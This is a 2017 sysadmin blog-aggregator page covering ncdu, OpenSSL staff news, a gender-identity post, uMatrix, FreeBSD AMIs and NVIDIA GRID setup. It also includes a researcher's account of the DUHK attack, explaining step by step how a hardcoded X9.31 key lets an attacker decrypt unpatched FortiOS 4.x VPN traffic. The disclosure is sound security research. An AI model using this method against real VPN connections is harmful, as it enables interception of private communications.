This revision of the law will authorize intelligence and security to intercept and analyze cable-bound (Internet) traffic, and will include far-reaching authorizations, including covert technical attacks, to facilitate their access to encrypted traffic.

Source: Logius: Staat der Nederlanden CA trust issue (WiV)

The post Staat der Nederlanden CA might be revoked from Mozilla Policy? appeared first on ma.ttias.be.

by Mattias Geniar at October 30, 2017 11:52 AM

October 29, 2017

Raymii.org

ncdu - for troubleshooting diskspace and inode issues

In my box of sysadmin tools there are multiple gems I use for troubleshooting servers. Since I work at a cloud provider, sometimes I have to fix servers that are not mine. One of those tools is `ncdu`. It's a very useful tool when a server has a full disk, whether it is out of disk space or out of inodes. This article covers ncdu and shows the process of finding the culprit when you're out of disk space or inodes.
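
For example, a typical first pass on a suspect filesystem might look like the following (a small sketch; ncdu's -x flag keeps the scan on one filesystem, and pressing 'c' in the interface shows per-directory item counts, which helps when you are out of inodes rather than bytes):

ncdu -x /var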

October 29, 2017 12:00 AM

October 27, 2017

OpenSSL

Steve Marquess

Steve Marquess is leaving the OpenSSL project as of the 15th of November 2017.

The OpenSSL Management Committee (OMC) would like to wish him all the best for the future.

All communication that used to go to Steve Marquess directly should now be sent to info@openssl.org in the first instance.

Thanks for your contributions to the project over the years!

October 27, 2017 01:00 AM

October 25, 2017

The Lone Sysadmin

Consistency Is the Hobgoblin of Little Minds

Ever heard someone tell you “consistency is the hobgoblin of little minds?” They’re misquoting Ralph Waldo Emerson by leaving out an important word: foolish. That’s like leaving out the word “not” in a statement. The whole meaning changes because of the omission. We can all agree that “I am on fire” and “I am not […]

The post Consistency Is the Hobgoblin of Little Minds appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 25, 2017 05:43 PM

Evaggelos Balaskas

Autonomous by Annalee Newitz

autonomous.jpg

Autonomous by Annalee Newitz

The year is 2144. A group of anti-patent scientists are working to reverse engineer drugs in free labs, so that (poor) people can have access to them. Agents of the International Property Coalition are trying to find the lead pirate-scientist and stop any patent violation by any means necessary. In this era, without a franchise (citizenship), autonomous robots and people are slaves. But only a few of the bots are autonomous. Even then, can they be free? Can androids choose their own gender identity? Transhumanism and life-extension drugs are helping people to live longer and better lives.

A science fiction novel without Digital Rights Management (DRM).

Tag(s): Autonomous, books

October 25, 2017 11:09 AM

October 24, 2017

The Geekess

Binaries are for computers

[Note: comments on this post will be moderated by someone other than me.]

Sage in a purple tie and black shirt (photo CC-BY-NC-ND Sage Sharp)

Recently, I’ve come to terms with the fact that I’m non-binary. Non-binary can be a bit of an umbrella term, but for me, being non-binary means I don’t identify as either a man or a woman. For me, gender is more like a 3D space, a universe of different traits. Most people gravitate towards a set of traits that we label as masculine or feminine. I don’t feel a strong pull towards being either really masculine or really feminine.

I’m writing this post for two reasons. The first reason is that representation matters. I know some non-binary people in tech and from the indie comics industry, but I’d love to see those voices and stories promoted. Hopefully being open and honest with people about my identity will help, both to raise awareness, and to give other people the courage to start an exploration into their own gender identity. I know talking with queer friends and reading comics helped me while I was working out my own gender identity.

The second reason I’m writing this is because there’s a couple ways allies can help me as I go through my transition:

  • Use my new name (Sage) and my correct pronouns (they/them)
  • Educate yourself on what it means to be non-binary
  • Think about how you use gender in your software and websites
  • Think about making your events more inclusive towards non-binary folks

Names

I’ve changed my name to Sage Sharp.

I would appreciate it if you could use my new name. If you’re thinking about writing about me, there’s a section on writing about individuals who are transitioning in “The Responsible Communication Style Guide”. You should buy a digital copy!

Pronouns and Titles

I use the pronoun ‘they’. If you’ve never had someone ask for you to use a specific pronoun, this Robot Hugs comic does a good job of explaining how to handle it.

If you have to add a formal title before my last name, please use ‘Mx Sharp’. ‘Mx’ is a gender-neutral honorific, like ‘Mr’, ‘Ms’, or ‘Mrs’. Mx is pronounced in a couple different ways: /ˈməks/, /ˈmɪks/ or /ˈmʌks/ (miks or muks). I like pronouncing it ‘mux’ like the electronics part multiplexer, but pick whichever pronunciation works for you. If you want to get really formal and are reaching for a term like ‘lady/gentlemen’, I prefer the term ‘gentleperson’.

I’ve found positive gender-neutral terms to describe myself with, like “dapper” or “cute”. I cringe every time a stranger attempts to gender me, since they usually settle on feminine forms of address. I wish more people would use gender-neutral terms like “folks”, “friend”, “comrade”, or say “Hello everyone!” or “Hi y’all” and leave it at that.

Being able to write in a gender neutral way is hard and takes a lot of practice. It means shifting from gendered terms like “sister/brother” or “daughter/son” to gender-neutral terms like “sibling” or “kid”. It means getting comfortable with the singular they instead of ‘she’ or ‘he’. Sometimes there isn’t a gender neutral term for a relationship like “aunt/uncle” and it means you have to make up some new term, like “Titi”. There’s some lists of gender-neutral titles but in general, just ask what term to use.

If this is all new and bewildering to you, I recommend the book ‘The ABCs of LGBTQ+‘. Another good book is ‘You’re in the wrong bathroom‘ which breaks down some common myths about non-binary and trans folks.

Gender Forms

I’m really not looking forward to my gender being listed as ‘other’ or ‘prefer not to say’ on every gender form out there. I don’t even know if I can change my gender in social media, email, credit cards, banking… It’s a giant headache to change my name, let alone hope that technology systems will allow me to change my gender. It’s probably a separate post all itself, or a topic for my Diversity Deep Dives mailing list.

If you’re a programmer, website designer, or user experience person, ask yourself: Do you even need to collect information about a person’s gender? Could your website use gender neutral language? If you do need to address someone in a gendered way, maybe you just need to ask for their preferred pronouns instead of their gender? Could you drop the use of gendered honorifics, like ‘Miss’, ‘Mrs’ and ‘Mr’, or ‘Sir’ and ‘Madam’?

Inclusive Tech Groups

There’s a lot of tech spaces that are designed to help connect people from groups who are underrepresented in tech. Some tech groups are for “women” or “girls” (which can sometimes mean young women, and sometimes means adult women). It’s unclear whether non-binary folks are included in such groups, which puts me in the awkward position of asking all the groups I’m currently involved in if this is still a space for me.

I recommend reading Kat’s post on the design of gender-inclusive tech spaces. If you run a group or event targeted at gender minorities in tech, consider what you mean by “women only” and whether you want to be more inclusive towards non-binary folks that also want a space away from the patriarchy.

I know that in the past, a lot of folks looked up to me as ‘a woman in open source’. Some people felt I was a role model, and some people felt triumphant that I overcame a lot of sexism and a toxic environment to do some pretty badass technical work. Guess what? I’m still a badass. As a non-binary person, I’m still a minority gender in tech. So I’m still going to continue to be my badass self, taking on the patriarchy.

Promote Pronouns

When you meet someone, don’t assume what their pronouns are. As an ally, you can help by introducing yourself and normalizing pronoun usage. E.g. “Hi, my name is Victor, and I use he/him pronouns.”

If you’re a conference organizer, make sure all your name tags have a space for pronoun stickers. Have sheets of pronoun stickers at registration, and make sure the registration volunteers point out the pronoun badge stickers. If someone is confused about what the pronouns are, have a handout on pronouns and gender ready to give them. Wiscon is a conference that does a very good job with pronouns.

Don’t print pronouns collected from the registration system on badges without permission, or force everyone to put a pronoun on their badge. Some people might use different pronouns in conversation with different people, for example, if a person is “out” as non-binary to some friends but not their coworkers. Some people are genderfluid (meaning their feelings about their gender may change over time, even day to day). Some people might be questioning their gender, and not know what pronouns they want yet. Some people may prefer not to have a pronoun sticker at all.

The best practice is to provide space for people who want to provide their pronouns, but don’t force it on everyone.

What if people misgender you?

Some people who knew me under my old name might get confused when you use my new name. It’s perfectly fine to remind them of past work I did under my old name, while emphasizing my new name and pronouns. For example:

“Sage Sharp? Who’s that?”

“Sage is a diversity and inclusion consultant with Otter Tech. They were a Linux kernel developer for 10 years and wrote the USB 3.0 driver. They help run the Outreachy internship program.”

“Oh, you mean Sarah Sharp?”

“Yeah. They changed their name to Sage and they use ‘they’ pronouns now.”

I know it might be hard for people who have known me to get used to my new name and pronoun. You might even slip up in conversation with me. That’s ok, just correct the word and move on with your conversation. No need to apologize or call attention to it. We’re all humans, and retraining the language centers of our brains takes time. As long as I can see you’re trying, we’re cool.

What about your old accounts?

The internet never forgets. There will be old pictures of me, articles about me under my old name, etc. I’m fine with that, because that’s all a part of my past, who I was and the experiences that make me who I am. It’s as much a part of who I am as the tattoo on my arm. I don’t feel sad or weird looking at old pictures of myself. Seeing my longer haircut or myself in more feminine clothing can be surprising because I’ve changed so much, but after that initial reaction what I feel most is empathy for my past self.

At the same time, I’m also not that person any more. I’d like to see current pictures of me with my current name and correct pronoun.

If you see a news article that uses my old name, please let them know about my new name and pronouns. (But if it’s some troll site, don’t engage.) Several photos of my new style can be found here. If you see a social media website that uses my old name, don’t bother emailing me about it. I might have abandoned it, or found the name/gender change process to be too complex. Speaking of email, my old email addresses will still work, but I’ll respond back with my new email address. Please update your phone and email contacts to use the name ‘Sage Sharp’.

Phew, that was a lot to process!

We’ll keep it simple. Hi, my name is Sage Sharp, and I use ‘they’ pronouns. It’s nice to meet you!

by Sage at October 24, 2017 05:00 PM

OpenSSL

Steve Henson

For as long as I have been involved in the OpenSSL project there has been one constant presence: Steve Henson. In fact he has been a part of the project since it was founded and he is the number 1 committer of all time (by a wide margin). I recall the first few times I had any dealings with him being somewhat in awe of his encyclopaedic knowledge of OpenSSL and all things crypto. Over the years Steve has made very many significant contributions both in terms of code but also in terms of being an active member of the management team.

I am sad to have to report that Steve has decided, for personal reasons, to move on to other things. The OpenSSL Management Committee (OMC) would like to wish him all the best for the future. In recognition of his huge contributions we will be listing him as an “OMC Emeritus” on our alumni page.

Good luck Steve!

October 24, 2017 01:00 AM

October 23, 2017

Cryptography Engineering

Attack of the week: DUHK

Before we get started, fair warning: this is going to be a post about a fairly absurd (but non-trivial!) attack on cryptographic systems. But that’s ok, because it’s based on a fairly absurd vulnerability.

This work comes from Nadia Heninger, Shaanan Cohney and myself, and follows up on some work we’ve been doing to look into the security of pseudorandom number generation in deployed cryptographic devices. We made a “fun” web page about it and came up with a silly logo. But since this affects something like 25,000 deployed Fortinet devices, the whole thing is actually kind of depressing.

The paper is called “Practical state recovery attacks against legacy RNG implementations”, and it attacks an old vulnerability in a pseudorandom number generator called ANSI X9.31, which is used in a lot of government-certified products. The TL;DR is that this ANSI generator really sucks, and is easy to misuse. Worse, when it’s misused — as it has been — some very bad things can happen to the cryptography that relies on it.

First, some background.

What is an ANSI, and why should I care?

A pseudorandom number generator (PRG) is a deterministic algorithm designed to “stretch” a short random seed into a large number of apparently random numbers. These algorithms are used ubiquitously in cryptographic software to supply all of the random bits that our protocols demand.

PRGs are so important, in fact, that the U.S. government has gone to some lengths to standardize them. Today there are three generators approved for use in the U.S. (FIPS) Cryptographic Module Validation Program. Up until 2016, there were four. This last one, which is called the ANSI X9.31 generator, is the one we’re going to talk about here.

ANSI X9.31 is a legacy pseudorandom generator based on a block cipher, typically AES. It takes as its initial seed a pair of values (K, V) where K is a key and V is an initial “seed” (or “state”). The generator now produces a long stream of pseudorandom bits by repeatedly applying the block cipher in the crazy arrangement below:

A single round of the ANSI X9.31 generator instantiated using AES. The Ti value is a “timestamp”, usually generated using the system clock. Ri (at right) represents the output of the generator. The state Vi is updated at each round. However, the key K is fixed throughout the whole process, and never updates.

The diagram above illustrates one of the funny properties of the ANSI generator: namely, that while the state value V updates for each iteration of the generator, the key K never changes. It remains fixed throughout the entire process.
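
To make the construction concrete, here is a minimal bash sketch of a single X9.31 round driven by the openssl command line. The key and state values are made-up placeholders and a real module works on raw AES blocks internally; this is only meant to show the data flow:

#!/bin/bash
# One toy ANSI X9.31 round with AES-128; K and V below are placeholder hex values.
K="000102030405060708090a0b0c0d0e0f"   # the fixed key -- it never changes
V="00112233445566778899aabbccddeeff"   # the current state
T=$(printf '%032x' "$(date +%s%6N)")   # timestamp block from the microsecond clock (GNU date)

aes() { echo -n "$1" | xxd -r -p | openssl enc -aes-128-ecb -K "$K" -nopad | xxd -p; }

xor() {                                # XOR two equal-length hex strings
  local out="" i byte
  for ((i = 0; i < ${#1}; i += 2)); do
    printf -v byte '%02x' $(( 0x${1:i:2} ^ 0x${2:i:2} ))
    out+=$byte
  done
  echo "$out"
}

I=$(aes "$T")                  # I  = E_K(T)
R=$(aes "$(xor "$I" "$V")")    # R  = E_K(I xor V)  -- the output block
V=$(aes "$(xor "$I" "$R")")    # V' = E_K(I xor R)  -- the next state
echo "output block: $R"
echo "next state:   $V"

Note that everything in this sketch except K either comes from a clock or, in the case of R, is frequently sent over the wire as a nonce.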

And this is a problem. Nearly twenty years ago, Kelsey, Schneier, Wagner and Hall pointed out that this fact makes the ANSI generator terribly insecure in the event that an attacker should ever learn the key K.

Specifically, if an attacker were to obtain K somehow, and then was able to learn only a single 16-byte raw output block (Ri) from a working PRG, she could do the following: (1) guess the timestamp T, (2) work backwards (decrypting using K) in order to recover the corresponding state value V, and now (3) run the generator forwards or backwards (with guesses for T) to obtain every previous and subsequent output of the generator.

Thus, if an application uses the ANSI generator to produce something like a random nonce (something that is typically sent in a protocol in cleartext), and also uses the generator to produce secret keys, this means an attacker could potentially recover those secret keys and completely break the protocol.

Of course, all of this requires that somehow the attacker learns the secret value K. At the time Kelsey et al. published their result, this was viewed as highly unlikely. After all, we’re really good at keeping secrets.

I assume you’re joking?

So far we’ve established that the ANSI generator is only secure if you can forever secure the value K. However, this seems fairly reasonable. Surely implementers won’t go around leaking their critical secrets all over the place. And certainly not in government-validated cryptographic modules. That would be crazy.

Yet crazy things do happen. We figured someone should probably check.

To see how the X9.31 key is managed in real products, our team developed a sophisticated analytic technique called “making a graduate student read every FIPS document on the CMVP website”. 

Most of the documents were fairly vague. And yet, a small handful of widely-used cryptographic modules had language that was troubling. Specifically, several vendors include language in their security policy that indicates the ANSI key was either hard-coded, or at least installed in a factory — as opposed to being freshly generated at each device startup.

Of even more concern: at least one of the hard-coded vendors was Fortinet, a very popular and successful maker of VPN devices and firewalls.

To get more specific, it turns out that starting apparently in 2009 (or perhaps earlier), every FortiOS 4.x device has shipped with a hardcoded value for K. This key has been involved in generating virtually every random bit used to establish VPN connections on those appliances, using both the TLS and IPSec protocols. The implication is that anyone with the resources to simply reverse-engineer the FortiOS firmware (between 2009 and today) could theoretically have been able to recover K themselves — and thus passively decrypt any VPN connection.

(Note: Independent of our work, the ANSI generator was replaced with a more secure alternative as of FortiOS 5.x. As a result of our disclosure, it has also been patched in FortiOS 4.3.19. There are still lots of unpatched firewalls out there, however.)

What does the attack look like?

Running an attack against a VPN device requires three ingredients. The first is the key K, which can be recovered from the FortiOS firmware using a bit of elbow grease. Shaanan Cohney (the aforementioned graduate student) was able to pull it out with a bit of effort.

Next, the attacker must have access to some VPN or TLS traffic. It’s important to note that this is not an active attack. All you really need is a network position that’s capable of monitoring full two-sided TLS or IPSec VPN connections.

Specifically, the attacker needs a full AES block (16 bytes) worth of output from the ANSI generator, plus part of a second block to check success against. Fortunately both TLS and IPSec (IKE) include nonces of sufficient length to obtain this output, and both are drawn from the ANSI generator, which lives in the FortiOS kernel. The attacker also needs the Diffie-Hellman ephemeral public keys, which are part of the protocol transcript.

Finally, you need to know the timestamp Ti that was used to operate the generator. In FortiOS, these timestamps have a 1-microsecond resolution, so guessing them is actually a bit of a challenge. Fortunately, TLS and other protocols include the time-in-seconds as one of their outputs, so the actual guessing space is typically only about 2^20 at most. Still, this guessing proves to be one of the most costly elements of the attack.

Given all of the ingredients above, the attacker now decrypts the output block taken from the protocol nonce using K, guesses each possible Ti value, and then winds forward or backwards until she finds the random bits that were used to generate that party’s Diffie-Hellman secret key. Fortunately, the key and nonce are generated one after the other, so this is not quite as painful as it sounds. But it is fairly time consuming. Fortunately, computers are fast, so this is not a dealbreaker.

With the secret key in hand, it’s possible to fully decrypt the VPN connection, read all traffic, and modify the data as needed.

Does the attack really work?

Since we’re not the NSA, it’s awfully hard for us to actually apply this attack to real Fortinet VPN connections in the wild. Not to mention that it would be somewhat unethical.

However, there’s nothing really unethical about scanning for FortiOS devices that are online and willing to accept incoming traffic from the Internet. To validate the attack, the team conducted a large-scale scan of the entire IPv4 address space. Each time we found a device that appeared to present as a FortiOS 4.x VPN, we initiated a connection with it and tested to see if we could break our own connection.

It turns out that there are a lot of FortiOS 4.x devices in the wild. Unfortunately, only a small number of them accept normal IPSec connections from strangers. Fortunately, however, a lot of them do accept TLS connections. Both protocol implementations use the same ANSI generator for their random numbers.

This scan allowed us to validate that — as of  October 2017 — the vulnerability was present and exploitable on more than 25,000 Fortinet devices across the Internet. And this count is likely conservative, since these were simply the devices that bothered to answer us when we scanned. A more sophisticated adversary like a nation-state would have access to existing VPN connections in flight.

In short, if you’re using a legacy Fortinet VPN you should probably patch.

So what does it all mean?

There are really three lessons to be learned from a bug like this one.

The first is that people make mistakes. We should probably design our crypto and certification processes to anticipate that, and make it much harder for these mistakes to become catastrophic decryption vulnerabilities like the one in FortiOS 4.x. Enough said.

The second is that government crypto certifications are largely worthless. I realize that seems like a big conclusion to draw from a single vulnerability. But this isn’t just a single vendor — it’s potentially several vendors that all fell prey to the same well-known 20-year old vulnerability. When a vulnerability is old enough to vote, your testing labs should be finding it. If they’re not finding things like this, what value are they adding?

Finally, there’s a lesson here about government standards. ANSI X9.31 (and its cousin X9.17) is over twenty years old. It’s (fortunately) been deprecated as of 2016, but a huge number of products still use it. This algorithm should have disappeared ten years earlier — and yet here we are. It’s almost certain that this small Fortinet vulnerability is just the tip of the iceberg. Following on revelations of a possible deliberate backdoor in the Dual EC generator, none of this stuff looks good. It’s time to give serious thought to how we make cryptographic devices resilient — even against the people who are supposed to be helping us secure them.

But that’s a topic for a much longer post.

 


by Matthew Green at October 23, 2017 06:28 PM


October 21, 2017

TaoSecurity

How to Minimize Leaking

I am hopeful that President Trump will not block release of the remaining classified documents addressing the 1963 assassination of President John F. Kennedy. I grew up a Roman Catholic in Massachusetts, so President Kennedy always fascinated me.

The 1991 Oliver Stone movie JFK fueled several years of hobbyist research into the assassination. (It's unfortunate the movie was so loaded with fictional content!) On the 30th anniversary of JFK's death in 1993, I led a moment of silence from the balcony of the Air Force Academy chow hall during noon meal. While stationed at Goodfellow AFB in Texas, Mrs B and I visited Dealey Plaza in Dallas and the Sixth Floor Museum.

Many years later, thanks to a 1992 law partially inspired by the Stone movie, the government has a chance to release the last classified assassination records. As a historian and former member of the intelligence community, I hope all of the documents become public. This would be a small but significant step towards minimizing the culture of information leaking in Washington, DC. If prospective leakers were part of a system that was known for releasing classified information prudently, regularly, and efficiently, it would decrease the leakers' motivation to evade the formal declassification process.

Many smart people have recommended improvements to the classification system. Check out this 2012 report for details.

by Richard Bejtlich (noreply@blogger.com) at October 21, 2017 07:43 PM

Electricmonk.nl

Umatrix makes the web usable again

As happens with all media, once corporations join in because there is money to be made, things quickly devolve into a flaming heap of shit. The internet is no exception to this rule. With the coming of Javascript and DHTML in the late 90's, ads soon started appearing on the web. Not long after, pop-ups – either with or without ads – became a common sighting. This set off a back-and-forth war of browsers trying to block annoyances such as pop-ups and advertisers coming up with innovative ways to annoy the crap out of everybody. What started with still images of ads, much like you'd have on traditional paper, soon changed into a moving, blinking, automatically playing audio and video crapfest.

Because the basics underlying the web are insecure-by-design, it is possible for browsers to make requests to any website in the world from any website you decide to visit. This of course was quickly picked up by content publishers, the media and advertisers alike, to track your every move on the internet in order to shove more lukewarm shit down the throats of the average consumer.

The rise and fall of ad blockers

The answer to this came in the form of Ad blockers: separate programs or extensions you install in your browser. They have a predefined list of ad domains that they'll block from loading. Naturally this upset the media and advertisers, some of whom equate it with stealing. One has to wonder if ignoring ads in the newspaper is also considered stealing. At any rate, it's hard to be sympathetic with the poor thirsty vampires in the advertising industry. They've shown again and again that they can't self-regulate their own actions. They'll go to great lengths to annoy you into buying their crap and to violate your privacy in the most horrible ways, all for a few extra eyeballs *.

Unfortunately, much like how the zombies refuse to stay dead once slain, so do the annoying features on the web. For the past few years the media, content producers, advertisers and basically everybody else have decided to redouble their efforts in the Annoyance Wars with such things as Javascript / HTML5 pop-ups begging you to sign up for their newsletters, automatically playing HTML5 videos, auto-loading of (or worse: redirecting to) the next article, detection of adblockers, bitcoin-mining Javascript running in the background when you visit a site, ever increasing and deeper tracking, super cookies, tracking pixels, the use of CDNs, etc.

For example, CNN's site loads resources from a staggering 61 domains. That's 61 places that can track you. 30 of those are known to track you and include Facebook, Google, a variety of specialized trackers, ad agencies, etc. It tries to run over 40 scripts and tries to place 8 cookies. And this is only from allowing scripts! I did not allow cross-site background requests or any of the blocked domains. I'm sure if I unblocked those, there would be much, much more.

To top it all off, advertisers have decided to go to the root of the problem, and have simply bought most ad blockers. These were then modified to let through certain "approved" ads. The sales pitch they give us is that they'll only allow nonintrusive ads. Kinda like a fifty-times convicted felon telling the parole board that he'll truly be good this time. In some cases they've even built tracking software directly into the ad blockers themselves. In other cases they're basically extorting money from websites in exchange for letting their ads through.

Bringing out the big guns

So… our ad blockers are being taken over by the enemy. Our browsers are highly insecure by default. Every site can send and retrieve data from any place on the web. Browsers can use our cameras, microphones and GPUs. The most recent addition is the ability to show notifications on our desktops. A feature that, surprise surprise, was quickly picked up by sites to shove more of their crap in our faces. Things are only going to get worse as browsers get more and more access to our PCs. The media has shown that they don't give a rat's ass about your privacy or rights as long as there's a few cents to make. The world's most-used browser is built by a company that lives off advertising. Have we lost the war? Do we just resign ourselves to the fact that we'll be tracked, spied upon, lied to, taken advantage of and spoon-fed advertisements like obedient little consumers every time we open a webpage?

No.

Enter umatrix

Umatrix is like a firewall for your browser. It stops web pages from doing anything. They can't set cookies, they can't load CSS or images. They can't run scripts, use iframes or send data to themselves or to other sites. Umatrix blocks everything. Umatrix is what browsers should be doing by default. Ad blockers are just not enough. They only block ads and then only the ones they know about. To get any decent kind of protection of your privacy, you always needed at least an Adblocker, a privacy blocker such as Privacy Badger and a script blocker such as Noscript. Umatrix replaces all of those, and does a better job at it too.

Umatrix gives you full insight into what a website is trying to do. It gives you complete control over what a website is and isn't allowed to do. It has a bit of a learning curve, which is why I wrote a tutorial for it.

When you just start out using umatrix, you'll find that many sites don't work properly. On the other hand, many sites work a lot better. If you take a little time to unblock things so that your favorite sites work again (and save those changes), you'll notice within a few hours that it's not so bad. Umatrix is still for technical users and even those might find it too much of a chore. I find it worth the small effort to unblock things if that means my privacy stays intact. And more importantly, I'm never annoyed anymore by ads or pop-ups, plus I'm much less likely to accidentally run some malicious javascript.

This is what a CNN article looks like with Umatrix enabled and only first-party (*.cnn.com) CSS and images allowed, which is what I have set as the default:

Look at that beauty. It's clean. It loads super fast. It cannot track me. It's free of ads, pop-ups, auto-playing videos, scripts and cookies. Remember, this didn't take any manual unblocking. This is just what it looks like out of the box with umatrix.

Umatrix makes the web usable again.

Get it, install it, love it

Get it for Firefox, Chrome or Opera. Umatrix is Open Source, so it cannot be bought out by ad agencies.

Read my tutorial to get started with umatrix, as the learning curve is fairly steep.

Thanks for reading and safe browsing!

 

 

*) Someone will probably bring up the whole "but content creators should / need / deserve money too!" argument again. I'm not interested in discussions about that. They've had the chance to behave, and they've misbehaved time and time again. At some point, you don't trust the pathological liars anymore. No content creator switched to a more decent ad provider that doesn't fuck its customers over. The blame is on them, not on the people blocking their tracking, spying, attention-grabbing shit. Don't want me looking at your content for free? Put up a paywall. People won't come to your site anymore if you did that? Then maybe your content wasn't worth money in the first place.

by admin at October 21, 2017 01:46 PM

Colin Percival

FreeBSD/EC2: Community vs. Marketplace AMIs

FreeBSD has been available in Amazon EC2 since FreeBSD 9.0 (January 2012), and from FreeBSD 10.2 (August 2015) AMIs have been built by the FreeBSD release engineering team as part of the regular release process. Release announcements go out with a block of text about where to find FreeBSD in EC2, for example (taken from the FreeBSD 11.1 release announcement):
   FreeBSD 11.1-RELEASE amd64 is also available on these cloud hosting
   platforms:

     * Amazon(R) EC2(TM):
       AMIs are available in the following regions:

         ap-south-1 region: ami-8a760ee5
         eu-west-2 region: ami-f2425396
         eu-west-1 region: ami-5302ec2a
         ap-northeast-2 region: ami-f575ab9b
         ap-northeast-1 region: ami-0a50b66c
         sa-east-1 region: ami-9ad8acf6
         ca-central-1 region: ami-622e9106
         ap-southeast-1 region: ami-6d75e50e
         ap-southeast-2 region: ami-bda2bede
         eu-central-1 region: ami-7588251a
         us-east-1 region: ami-70504266
         us-east-2 region: ami-0d725268
         us-west-1 region: ami-8b0128eb
         us-west-2 region: ami-dda7bea4

       AMIs will also be available in the Amazon(R) Marketplace once they have
       completed third-party specific validation at:
       https://aws.amazon.com/marketplace/pp/B01LWSWRED/
This leads to a question I am frequently asked: Which way should FreeBSD users launch their instances? The answer, as usual, is "it depends". Here are some of the advantages of each option, to help you decide which to use.
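
If you want to try one of the community AMIs from the command line, a minimal sketch with the AWS CLI might look like the following; the instance type and key pair name are placeholders, and the AMI ID is the us-east-1 image listed above:

    # Launch the FreeBSD 11.1-RELEASE community AMI in us-east-1 (adjust region/AMI to taste)
    aws ec2 run-instances \
        --region us-east-1 \
        --image-id ami-70504266 \
        --instance-type t2.micro \
        --key-name my-keypair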

October 21, 2017 12:45 AM

October 20, 2017

Sean's IT Blog

The Virtual Horizon Podcast Episode 1 – A Conversation with Matt Heldstab

VMUG Leader Matt Heldstab joins me to talk about the VMUG EUC Explore event and community involvement.

 

Podcast music is a derivative of
Boogie Woogie Bed by Jason Shaw (audionatix.com)
Licensed under Creative Commons: By Attribution 3.0 License
http://creativecommons.org/licenses/by/3.0/

 


by seanpmassey at October 20, 2017 01:15 PM

October 18, 2017

Sean's IT Blog

Configuring a Headless CentOS Virtual Machine for NVIDIA GRID vGPU #blogtober

When IT administrators think of GPUs, the first thing that comes to mind for many is gaming.  But GPUs also have business applications.  They’re mainly found in high end workstations to support graphics intensive applications like 3D CAD and medical imaging.

But GPUs will have other uses in the enterprise.  Many of the emerging technologies, such as artificial intelligence and deep learning, utilize GPUs to perform compute operations.  These will start finding their way into the data center, either as part of line-of-business applications or as part of IT operations tools.  This could also allow the business to utilize GRID environments after hours for other forms of data processing.

This guide will show you how to build headless virtual machines that can take advantage of NVIDIA GRID vGPU for GPU compute and CUDA.  In order to do this, you will need to have a Pascal Series NVIDIA Tesla card such as the P4, P40, or P100 and the GRID 5.0 drivers.  The GRID components will also need to be configured in your hypervisor, and you will need to have the GRID drivers for Linux.

I’ll be using CentOS 7.x for this guide.  My base CentOS configuration is a minimal install with no graphical shell and a few additional packages like Nano and Open VM Tools.  I use Bob Plankers’ guide for preparing my VM as a template.

The steps for setting up a headless CentOS VM with GRID are:

  1. Deploy your CentOS VM.  This can be from an existing template or installed from scratch.  This VM should not have a graphical shell installed, or it should be in a run mode that does not execute the GUI.
  2. Attach a GRID profile to the virtual machine by adding a shared PCI device in vCenter.  The selected profile will need to be one of the Virtual Workstation profiles, and these all end with a Q.
  3. GRID requires a 100% memory reservation.  When you add an NVIDIA GRID shared PCI device, there will be an associated prompt to reserve all system memory.
  4. Update the VM to ensure all applications and components are the latest version using the following command:
    yum update -y
  5. In order to build the GRID driver for Linux, you will need to install a few additional packages.  Install these packages with the following command:
    yum install -y epel-release dkms libstdc++.i686 gcc kernel-devel 
  6. Copy the Linux GRID drivers to your VM using a tool like WinSCP.  I generally place the files in /tmp.
  7. Make the driver package executable with the following command:
    chmod +x NVIDIA-Linux-x86_64-384.73-grid.run
  8. Execute the driver package.  When we execute this, we will also be adding the --dkms flag to support Dynamic Kernel Module Support.  This will enable the system to automatically recompile the driver whenever a kernel update is installed.  The command to run the driver install is:
    bash ./NVIDIA-Linux-x86_64-384.73-grid.run --dkms
  9. When prompted, register the kernel module sources with DKMS by selecting Yes and pressing Enter.
  10. You may receive an error about the installer not being able to locate the X Server path.  Click OK.  It is safe to ignore this error.
  11. Install the 32-bit Compatibility Libraries by selecting Yes and pressing Enter.
  12. At this point, the installer will start to build the DKMS module and install the driver.  
  13. After the install completes, you will be prompted to use the nvidia-xconfig utility to update your X Server configuration.  X Server should not be installed because this is a headless machine, so select No and press Enter.
  14. The install is complete.  Press Enter to exit the installer.
  15. To validate that the NVIDIA drivers are installed and running properly, run nvidia-smi to get the status of the video card.  
  16. Next, we’ll need to configure GRID licensing.  We’ll need to create the GRID licensing file from a template supplied by NVIDIA with the following command:
    cp  /etc/nvidia/gridd.conf.template  /etc/nvidia/gridd.conf
  17. Edit the GRID licensing file using the text editor of your choice.  I prefer Nano, so the command I would use is:
    nano  /etc/nvidia/gridd.conf
  18. Fill in the ServerAddress and BackupServerAddress fields with the fully-qualified domain name or IP addresses of your licensing servers.
  19. Set the FeatureType to 2 to configure the system to retrieve a Virtual Workstation license.  The Virtual Workstation license is required to support the CUDA features for GPU Compute.
  20. Save the license file.
  21. Restart the GRID Service with the following command:
    service nvidia-gridd restart
  22. Validate that the machine retrieved a license with the following command:
    grep gridd /var/log/messages
  23. Download the NVIDIA CUDA Toolkit.
    wget https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run
  24. Make the toolkit installer executable.
    chmod +x cuda_9.0.176_384.81_linux-run
  25. Execute the CUDA Toolkit installer.
    bash cuda_9.0.176_384.81_linux-run
  26. Accept the EULA.
  27. You will be prompted to download the CUDA Driver.  Press N to decline the new driver. This driver does not match the NVIDIA GRID driver version, and it will break the NVIDIA setup.  The GRID driver in the VM has to match the GRID software that is installed in the hypervisor.
  28. When prompted to install the CUDA 9.0 toolkit, press Y.
  29. Accept the Default Location for the CUDA toolkit.
  30. When prompted to create a symlink at /usr/local/cuda, press Y.
  31. When prompted to install the CUDA 9.0 samples, press Y.
  32. Accept the default location for the samples.
  33. Reboot the virtual machine.
  34. Log in and run nvidia-smi again.  Validate that you get the table output similar to step 15.  If you do not receive this, and you get an error, it means that you likely installed the driver that is included with the CUDA toolkit.  If that happens, you will need to start over.

At this point, you have a headless VM with the NVIDIA Drivers and CUDA Toolkit installed.  So what can you do with this?  Just about anything that requires CUDA.  You can experiment with deep learning frameworks like Tensorflow, build virtual render nodes for tools like Blender, or even use Matlab for GPU compute.
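
If you want an additional sanity check that CUDA itself is functional, one option is to build and run the deviceQuery sample. This assumes the samples were installed to the installer's default location (typically $HOME/NVIDIA_CUDA-9.0_Samples); adjust the path if you chose a different directory.

    # Build and run the CUDA deviceQuery sample to confirm the GPU is visible to CUDA
    cd $HOME/NVIDIA_CUDA-9.0_Samples/1_Utilities/deviceQuery
    make
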